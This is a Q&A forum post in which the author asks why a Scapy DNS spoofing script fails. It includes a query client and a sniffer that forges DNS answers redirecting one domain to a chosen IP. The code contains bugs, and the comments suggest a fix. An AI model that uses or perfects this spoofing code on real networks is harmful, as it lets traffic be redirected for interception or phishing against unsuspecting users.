# Can not send DNS reply in Scapy

Tags: python, dns, scapy, spoofing

I am trying to write code for DNS spoofing using Scapy. Everything is working properly except I got a wrong response from my DNS server. I supposed to get response like:

```
DNS Ans "198.71.55.197"
```

But I got

```
DNS Qry "google.com"
```

Here is my code for client:

```
from scapy.all import DNS, DNSQR, IP, sr1, UDP

dns_req = IP(dst='8.8.8.8')/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname='www.thepacketgeek.com'))
answer = sr1(dns_req, verbose=0)

print(answer[DNS].summary())
```

and this is my code for DNS Spoofing Server:

```
from scapy.all import *
DNS_SERVER_IP = "127.0.0.1"

def packetsniff(packet):
if(packet.haslayer(DNS) and packet.getlayer(DNS).qr==0):

    if("www.thepacketgeek.com" in str(packet[DNS]["DNS Question Record"].qname)):
        spf_res = IP(dst=packet[IP].src, src=packet[IP].dst)/\
              UDP(dport=packet[UDP].sport,sport=packet[UDP].dport)/\
              DNS(id=packet[DNS].id,qr=1, aa=1, ancount=1,qd = packet[DNS].qd,\
                  an=DNSRR(rrname="pkt[DNSQR].qname", ttl=10, rdata="192.168.1.5"))                                        
        send(spf_res, verbose=0)
        return "spoofed request sent :" +packet[IP].src
    else:
        return "not me"


sniff(filter="udp", prn=packetsniff)
```

What I am doing wrong?

Comment: `an=DNSRR(rrname=“pkt...”` remove the quotes ?

Comment: I tried by removing the quotes, still not working.